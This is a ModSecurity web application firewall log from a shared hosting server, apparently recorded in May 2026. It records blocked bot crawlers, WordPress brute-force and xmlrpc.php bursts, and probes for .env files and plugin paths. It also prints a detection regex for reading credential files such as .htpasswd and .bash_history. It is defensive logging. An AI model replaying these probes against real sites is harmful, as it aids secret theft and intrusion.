[Tue May 26 13:20:13.089492 2026] [security2:error] [pid 501489:tid 501632] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQtGkFNZ9cRlz80IjlswAAAJI"]
[Tue May 26 13:20:15.453783 2026] [security2:error] [pid 501489:tid 501711] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQt2kFNZ9cRlz80Ijl5gAAAOA"]
[Tue May 26 13:20:15.470117 2026] [security2:error] [pid 501489:tid 501668] [client 91.196.152.250:54641] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.commune.azurmediatec.com"] [uri "/index.php"] [unique_id "ahVQtmkFNZ9cRlz80Ijl3QAAALU"]
[Tue May 26 13:20:17.369180 2026] [security2:error] [pid 501489:tid 501695] [client 74.249.173.207:4115] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/404.php"] [unique_id "ahVQuWkFNZ9cRlz80IjmLwAAANA"]
[Tue May 26 13:20:17.696459 2026] [security2:error] [pid 501489:tid 501666] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQuWkFNZ9cRlz80IjmKgAAALM"]
[Tue May 26 13:20:18.417804 2026] [security2:error] [pid 501489:tid 501748] [client 85.208.96.201:41554] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/7/"] [unique_id "ahVQumkFNZ9cRlz80IjmSwAAAQE"]
[Tue May 26 13:20:18.417920 2026] [security2:error] [pid 501489:tid 501748] [client 85.208.96.201:41554] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/7/"] [unique_id "ahVQumkFNZ9cRlz80IjmSwAAAQE"]
[Tue May 26 13:20:18.908765 2026] [security2:error] [pid 501489:tid 501494] [remote 91.211.32.121:38891] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "businessclubinternational.net"] [uri "/wp-content/plugins/user-registration-advanced-fields/readme.txt"] [unique_id "ahVQumkFNZ9cRlz80IjmUgAA1wQ"], referer: https://businessclubinternational.net/
[Tue May 26 13:20:20.089370 2026] [security2:error] [pid 501489:tid 501725] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQu2kFNZ9cRlz80IjmcAAAAO0"]
[Tue May 26 13:20:22.781120 2026] [security2:error] [pid 501489:tid 501670] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQvmkFNZ9cRlz80IjmugAAALc"]
[Tue May 26 13:20:23.081573 2026] [security2:error] [pid 501489:tid 501729] [client 77.83.3.101:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQvmkFNZ9cRlz80IjmwwAAAPA"]
[Tue May 26 13:20:24.186066 2026] [security2:error] [pid 501489:tid 501661] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQv2kFNZ9cRlz80Ijm6QAAAK4"]
[Tue May 26 13:20:25.304472 2026] [security2:error] [pid 501489:tid 501623] [client 74.249.173.207:4367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/wp-admin/user/index.php"] [unique_id "ahVQwWkFNZ9cRlz80IjnJgAAAIk"]
[Tue May 26 13:20:26.533407 2026] [security2:error] [pid 501489:tid 501664] [client 34.139.181.181:54141] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQwWkFNZ9cRlz80IjnOAAAALE"]
[Tue May 26 13:20:26.746981 2026] [security2:error] [pid 501489:tid 501666] [client 34.139.181.181:53926] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQwmkFNZ9cRlz80IjnSAAAALM"]
[Tue May 26 13:20:27.184586 2026] [security2:error] [pid 501489:tid 501658] [client 34.139.181.181:62971] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQw2kFNZ9cRlz80IjnXQAAAKs"]
[Tue May 26 13:20:27.192759 2026] [security2:error] [pid 501489:tid 501622] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQwmkFNZ9cRlz80IjnTQAAAIg"]
[Tue May 26 13:20:27.536323 2026] [security2:error] [pid 501489:tid 501673] [client 34.139.181.181:62686] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQw2kFNZ9cRlz80IjnaQAAALo"]
[Tue May 26 13:20:27.749783 2026] [security2:error] [pid 501489:tid 501696] [client 34.139.181.181:52483] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQw2kFNZ9cRlz80IjnagAAANE"]
[Tue May 26 13:20:27.960523 2026] [security2:error] [pid 501489:tid 501617] [remote 211.23.68.235:3011] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVQw2kFNZ9cRlz80IjnawAA3H8"]
[Tue May 26 13:20:28.086834 2026] [security2:error] [pid 501489:tid 501680] [client 34.139.181.181:51415] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQxGkFNZ9cRlz80IjncgAAAME"]
[Tue May 26 13:20:28.404970 2026] [security2:error] [pid 501489:tid 501701] [client 34.139.181.181:56785] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQxGkFNZ9cRlz80IjneQAAANY"]
[Tue May 26 13:20:28.639981 2026] [security2:error] [pid 501489:tid 501692] [client 34.139.181.181:49356] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQxGkFNZ9cRlz80IjnegAAAM0"]
[Tue May 26 13:20:28.911938 2026] [security2:error] [pid 501489:tid 501671] [client 34.139.181.181:52015] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQxGkFNZ9cRlz80IjnhQAAALg"]
[Tue May 26 13:20:29.272780 2026] [security2:error] [pid 501489:tid 501723] [client 34.139.181.181:56346] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQxWkFNZ9cRlz80IjnkAAAAOs"]
[Tue May 26 13:20:29.528029 2026] [security2:error] [pid 501489:tid 501657] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQxWkFNZ9cRlz80IjnjgAAAKo"]
[Tue May 26 13:20:29.715984 2026] [security2:error] [pid 501489:tid 501658] [client 114.119.132.163:63367] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "moneyapp.com.co"] [uri "/politica-uso-de-redes-sociales"] [unique_id "ahVQxWkFNZ9cRlz80IjnogAAAKs"], referer: https://www.moneyapp.com.co/
[Tue May 26 13:20:29.728763 2026] [security2:error] [pid 501489:tid 501745] [client 34.139.181.181:64100] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQxWkFNZ9cRlz80IjnoQAAAP4"]
[Tue May 26 13:20:30.020364 2026] [security2:error] [pid 501489:tid 501662] [client 34.139.181.181:54529] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQxmkFNZ9cRlz80IjnpgAAAK8"]
[Tue May 26 13:20:30.020480 2026] [security2:error] [pid 501489:tid 501662] [client 34.139.181.181:54529] ModSecurity: Warning. Operator GE matched 2 at IP:dos_burst_counter. [file "/etc/httpd/modsecurity.d/03_asl_dos.conf"] [line "99"] [id "350114"] [rev "1"] [msg "Atomicorp.com WAF Rules: Potential Denial of Service (DoS) Attack from  - # of Request Bursts: 2"] [severity "ERROR"] [tag "no_ar"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQxmkFNZ9cRlz80IjnpgAAAK8"]
[Tue May 26 13:20:30.020505 2026] [security2:error] [pid 501489:tid 501662] [client 34.139.181.181:54529] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahVQxmkFNZ9cRlz80IjnpgAAAK8"]
[Tue May 26 13:20:31.163523 2026] [security2:error] [pid 501489:tid 501669] [client 74.249.173.207:4364] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/wp-conf.php"] [unique_id "ahVQx2kFNZ9cRlz80IjnvwAAALY"]
[Tue May 26 13:20:31.994957 2026] [security2:error] [pid 501489:tid 501709] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQx2kFNZ9cRlz80IjnywAAAN4"]
[Tue May 26 13:20:34.060558 2026] [security2:error] [pid 501489:tid 501619] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQyWkFNZ9cRlz80Ijn8wAAAIU"]
[Tue May 26 13:20:35.251134 2026] [security2:error] [pid 501489:tid 501524] [remote 173.249.21.166:51106] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 166.21.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahVQy2kFNZ9cRlz80IjoFgAA8SI"]
[Tue May 26 13:20:35.921114 2026] [security2:error] [pid 501489:tid 501748] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQy2kFNZ9cRlz80IjoIgAAAQE"]
[Tue May 26 13:20:37.085012 2026] [security2:error] [pid 501489:tid 501727] [client 176.65.139.235:24574] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.kumarindustry.svijaykumar.in"] [uri "/.env"] [unique_id "ahVQzWkFNZ9cRlz80IjoPgAAAO4"]
[Tue May 26 13:20:37.448465 2026] [security2:error] [pid 501489:tid 501733] [client 176.65.139.236:16506] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.maharajancars.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVQzWkFNZ9cRlz80IjoRQAAAPM"]
[Tue May 26 13:20:38.342777 2026] [security2:error] [pid 501489:tid 501717] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQzWkFNZ9cRlz80IjoWAAAAOY"]
[Tue May 26 13:20:38.389724 2026] [security2:error] [pid 501489:tid 501663] [client 176.65.139.231:44746] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.acacia.svijaykumar.in"] [uri "/.env"] [unique_id "ahVQzmkFNZ9cRlz80IjoXwAAALA"]
[Tue May 26 13:20:41.178750 2026] [security2:error] [pid 501489:tid 501725] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ0GkFNZ9cRlz80IjongAAAO0"]
[Tue May 26 13:20:41.788133 2026] [security2:error] [pid 501489:tid 501729] [client 176.65.139.233:19940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "acacia.org.in"] [uri "/.env"] [unique_id "ahVQ0WkFNZ9cRlz80IjotAAAAPA"]
[Tue May 26 13:20:43.544187 2026] [security2:error] [pid 501489:tid 501723] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ02kFNZ9cRlz80IjozwAAAOs"]
[Tue May 26 13:20:45.949222 2026] [security2:error] [pid 501489:tid 501621] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ1WkFNZ9cRlz80IjpCwAAAIc"]
[Tue May 26 13:20:47.965374 2026] [security2:error] [pid 501489:tid 501653] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ12kFNZ9cRlz80IjpRgAAAKY"]
[Tue May 26 13:20:48.079673 2026] [security2:error] [pid 501489:tid 501733] [client 14.188.126.143:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ12kFNZ9cRlz80IjpUAAAAPM"]
[Tue May 26 13:20:48.714462 2026] [security2:error] [pid 501489:tid 501712] [client 4.204.220.190:9120] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.techawarness.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVQ2GkFNZ9cRlz80IjpZwAAAOE"]
[Tue May 26 13:20:48.714595 2026] [security2:error] [pid 501489:tid 501712] [client 4.204.220.190:9120] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.techawarness.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVQ2GkFNZ9cRlz80IjpZwAAAOE"]
[Tue May 26 13:20:48.859962 2026] [security2:error] [pid 501489:tid 501629] [client 4.204.220.190:9148] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.techawarness.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahVQ2GkFNZ9cRlz80IjpawAAAI8"]
[Tue May 26 13:20:48.860062 2026] [security2:error] [pid 501489:tid 501629] [client 4.204.220.190:9148] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.techawarness.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahVQ2GkFNZ9cRlz80IjpawAAAI8"]
[Tue May 26 13:20:49.044432 2026] [security2:error] [pid 501489:tid 501627] [client 74.7.230.10:50248] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.prototypecommune.azurmediatec.com"] [uri "/robots.txt"] [unique_id "ahVQ2WkFNZ9cRlz80IjpcAAAjQI"]
[Tue May 26 13:20:50.744602 2026] [security2:error] [pid 501489:tid 501687] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ2mkFNZ9cRlz80IjplAAAAMg"]
[Tue May 26 13:20:51.115229 2026] [security2:error] [pid 501489:tid 501648] [client 176.65.139.239:34278] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "traderscafe.club.jiyani.in"] [uri "/.env"] [unique_id "ahVQ22kFNZ9cRlz80IjppwAAAKE"]
[Tue May 26 13:20:51.284215 2026] [security2:error] [pid 501489:tid 501713] [client 114.119.136.72:61427] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahVQ22kFNZ9cRlz80IjpqwAAAOI"], referer: https://gti-club.ru/forum/showthread.php?t=49528
[Tue May 26 13:20:52.885936 2026] [security2:error] [pid 501489:tid 501680] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ3GkFNZ9cRlz80IjpxwAAAME"]
[Tue May 26 13:20:53.296109 2026] [security2:error] [pid 501489:tid 501662] [client 176.65.139.231:31864] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.traderscafe.jiyani.in"] [uri "/.env"] [unique_id "ahVQ3WkFNZ9cRlz80Ijp5QAAAK8"]
[Tue May 26 13:20:55.376756 2026] [security2:error] [pid 501489:tid 501674] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ3mkFNZ9cRlz80IjqGgAAALs"]
[Tue May 26 13:20:57.562349 2026] [security2:error] [pid 501489:tid 501626] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQ4WkFNZ9cRlz80IjqXQAAAIw"]
[Tue May 26 13:20:58.314327 2026] [security2:error] [pid 501489:tid 501496] [remote 74.7.241.58:50846] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVQ4mkFNZ9cRlz80IjqcgAAmgY"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/lib
